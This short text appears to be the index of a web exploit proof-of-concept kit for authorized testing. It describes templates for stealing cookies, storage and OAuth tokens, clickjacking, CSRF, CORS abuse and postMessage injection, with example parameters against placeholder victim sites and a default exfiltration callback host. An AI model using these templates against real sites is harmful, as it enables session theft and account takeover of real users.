Reusable exploit PoC templates for authorized security testing.
Exfiltrates cookies, DOM, localStorage, and URL data. Triple-channel delivery (image, beacon, fetch).
?exfil=...&tag=name&grab=cookies,dom,storage
Transparent iframe overlay with configurable bait text and opacity.
?target=https://victim.com/settings&opacity=0.0001&label=Click+Here
Form-based and JSON-body CSRF with auto-submit. Supports GET/POST/PUT/DELETE.
?action=https://api.victim.com/update&method=POST&fields=email:evil@attacker.com
Tests CORS misconfiguration with credentialed cross-origin requests. Auto-analyzes response headers.
?target=https://api.victim.com/user&credentials=true
Landing page for redirect chains. Captures tokens from query params and hash fragments (OAuth/OIDC).
?exfil=...&tag=oidc&redirect=https://legit-site.com
Iframes a target and captures/injects postMessages. Supports listen, inject, or both modes.
?target=https://victim.com/embedded&mode=both&inject={"action":"test"}
All callbacks default to redirect.totally-not-malware.com/exfil